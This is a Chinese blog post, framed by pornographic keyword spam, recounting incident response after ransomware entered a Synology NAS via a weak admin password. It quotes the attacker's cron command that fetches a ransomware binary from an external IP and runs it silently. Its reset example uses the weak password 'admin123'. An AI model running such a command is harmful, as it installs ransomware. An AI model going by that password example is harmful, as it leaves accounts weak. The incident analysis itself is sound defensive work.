日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

一次群晖中勒索病毒后的应急响应

發布時間:2025/3/21 编程问答 19 豆豆
生活随笔 收集整理的這篇文章主要介紹了 一次群晖中勒索病毒后的应急响应 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

群暉是一種NAS(網絡附屬存儲)系統,在生活中主要扮演個人私有云角色,可以將文件存儲于 NAS,并通過網頁瀏覽器或手機應用程序可實現存儲和共享,同時還提供的豐富應用以方便管理應用。借助群暉提供的 QuickConnect 快連服務,無需隨身攜帶存儲設備,即可以隨時隨地訪問NAS。因為這些優點,群暉往往被當做是NAS的首選。

但偏偏這次被上勒索病毒了,通過資料查詢發現該病毒早在2019年安全專家就已經分析過并已提供預警信息,一旦感染,其中的文件都會被加密,并通過留下的文件索要比特幣。經過初步判斷是通過web界面的弱口令進去的,之后創建了一個定時任務從美國某個IP下載文件來執行命令,并通過勒索病毒對文件進行了加密且暫時未發現該病毒有橫向行動。本文主要記錄群暉中勒索病毒后的應急響應過程。

一、攻擊流程

(一)獲取攻擊目標

目標地址為http://x.x.x.x:5000,根據資料查詢群暉的默認端口就是5000和5001,那么黑客應該是有針對性地通過批量掃描對公網上的IP地址的5000以及5001端口進行檢測,如果掃描到為群暉系統,那么就記錄下來保存結果


(二)實施弱口令爆破

通過工具對目標站點的默認管理賬號admin進行爆破,通過admin/123456爆破進入群暉NAS系統,并且黑客采取了動態切換代理IP的方式來提升我們的溯源難度。

(三)植入勒索病毒

以admin登錄后便植入了勒索病毒,加密硬盤數據(文件類型為encrypt)并留下了比特幣支付地址。

二、應急流程

目標群暉系統版本的DSM為6.2.3-25426,CPU為INTEL Celeron J3455,在公網上沒有已知漏洞存在能夠直接進入目標。

(一)修改密碼

既然知道了入侵源頭,那么先把弱口令修改掉,防止黑客再次通過弱口令登錄,可以通過web系統界面或服務器這兩種方式進行修改

(1)直接修改密碼

將密碼修改為強口令,最好啟用2步驟驗證來提高安全性

(2)在服務器中修改

1、在web界面開啟22端口

2、通過ssh登錄目標群暉的admin賬戶(admin為群暉的默認賬戶)
3、輸入以下命令,直接切換為root權限

sudo su -

4、輸入以下命令,修改密碼為admin123

synouser --setpw admin admin123

(二)日志分析

根據受害公司的反饋,他們是從7月29日發現文件被加密,而到了8月3日才尋求技術幫助,那么通過群暉自帶的日志中心可以發現在7月28日晚上11點19分有來自83.97.20.103通過登錄admin賬號

當然溯源這個IP并沒有什么卵用,因為是海外并已被標記為代理、掃描地址

通過日志查詢還發現攻擊者在7月28日19分還創建了定時任務

執行的具體命令如下,主要功能是進入/tmp目錄下將crp_linux_386文件下載下來并賦予777權限輸出為386,通過nohub永久執行386程序且不輸出任何信息到終端

cd /tmp && wget --no-check-certificate -O 386 http://98.144.56.47/1/crp_linux_386;chmod 0777 ./386;nohub ./386 --syno=true </dev/null> /dev/null 2>&1 &

在微步上查詢98.144.56.47,發現已標識為勒索程序,數據解密的希望已經十分渺茫

(三)病毒查殺

首先先將tmp目錄下的386文件刪除(但是未保存病毒原件,不能仔細分析該病毒,比較可惜),之后主要通過群暉自帶的插件Antivirus Essential查看在群暉中是否留有病毒

(1)下載Antivirus Essential

(2)全盤掃描

(3)隔離病毒

(四)數據解密

這個太有意思了,在第一天訪談之后,老板去找了淘寶上的店家破解,我一開始以為淘寶的店家真的那么牛,這種加密的數據都能破解,后來訪問了暗網的地址才發現,淘寶店家直接出錢買了解密工具,直接凈賺xxxx元。

復制一個加密文件通過下載的解密程序嘗試進行解密,最后成功解密。解密過程如下:

.\decryptor_windows_x86.exe -s C:\test\

三、防范方法

1、停用默認管理賬號admin,新建一個不同的賬號并分配管理權限

2、杜絕弱口令,設置強口令,可參考等保要求中的長度八位以上,由數字、字母、特殊字符構成

3、修改默認登錄端口,可修改如10000+以上的端口

4、開啟登錄失敗鎖定,對多次登錄失敗的IP進行鎖定

5、安裝安全工具(安全顧問),定期更新補丁并升級版本

6、啟用防火墻,配置出入規則

7、文件版本回滾,能輕松將文件還原至感染前的狀態,可以有效防止因感染勒索病毒后文件無法訪問的情況

8、文件權限控制,在分享文件時設置訪問密碼、有效期等,并對文件權限進行控制

總結

以上是生活随笔為你收集整理的一次群晖中勒索病毒后的应急响应的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 中文字幕免费在线看线人动作大片 | 国产区小视频 | 日本少妇高潮抽搐 | 亚洲人成电影在线播放 | 国产欧美日韩成人 | 亚洲成a人片777777久久 | 中文字幕在线播放第一页 | www.17c.com喷水少妇 | 久久国产成人 | 禁漫天堂下载18 | 中文字幕在线官网 | 黄色一级小视频 | 欧美熟妇另类久久久久久不卡 | 欧美精品一区二区在线播放 | 女同性做受全过程动图 | 麻豆观看 | 亚洲熟妇毛茸茸 | 男女猛烈无遮挡 | 成人mv| 免费黄色看片网站 | 日韩国产精品一区二区三区 | 人人插人人草 | 国产一区二区三区四区在线观看 | 奇米影视亚洲春色 | 高清中文字幕mv的电影 | 狠狠操天天射 | 中文字幕一区二区视频 | 美女色诱男人激情视频 | 五月天黄色小说 | 巨茎大战刘亦菲 | 蜜桃一区二区三区 | 国产美女引诱水电工 | 国产ts在线观看 | 成人免费观看视频 | 欧美最猛性xxxxx(亚洲精品) | 国产精品区二区三区日本 | 久久精品久久国产 | 亚洲播播 | 美女激情网站 | 99久久精品免费看国产 | 少妇av一区 | 亚洲乱码中文字幕久久孕妇黑人 | 欧美日韩人妻精品一区二区 | 日韩一级片在线播放 | av女优天堂在线观看 | 无码人妻精品一区二 | 亚洲免费观看高清完整 | 特种兵之深入敌后高清全集免费观看 | 操批网站 | 日韩啪| 青青草视频免费观看 | 制服诱惑一区 | 久久亚洲精精品中文字幕早川悠里 | 黄色一级小说 | 欧美经典一区二区三区 | 日本高清在线观看 | 天堂中文在线看 | 禁漫天堂下载18 | 海角国产乱辈乱精品视频 | 亚洲av熟女高潮一区二区 | 与子敌伦刺激对白播放的优点 | 涩涩视频免费观看 | 最新视频在线观看 | 一级影片在线观看 | 国产欧美一区二区三区在线看蜜臀 | 俄罗斯毛片 | 亚洲情se| 亚洲88 | 69久久精品无码一区二区 | 黄网站欧美内射 | 美腿丝袜亚洲综合 | av观看网 | 影音先锋亚洲天堂 | 免费黄网站在线 | 蜜臀av免费一区二区三区水牛 | 永久免费看黄网站 | a视频在线观看免费 | 91video | 91综合精品 | 99视频这里有精品 | 日剧大尺度床戏做爰 | 国产一区二区三区黄片 | 亚洲国产精品视频一区 | 在线色亚洲| 黑人一区二区三区四区五区 | 国产精品 色 | 免费禁漫天堂a3d | 伊伊成人| 丁香花电影免费播放电影 | 久久亚洲av无码精品色午夜麻豆 | 中文自拍 | 与子敌伦刺激对白播放的优点 | 精品国产一区二区三区久久狼黑人 | 日本在线观看视频网站 | 亚洲色大成网站www www.97ai.com | 新国产视频 | av午夜天堂 | 日本在线中文 | 国产91绿帽单男绿奴 |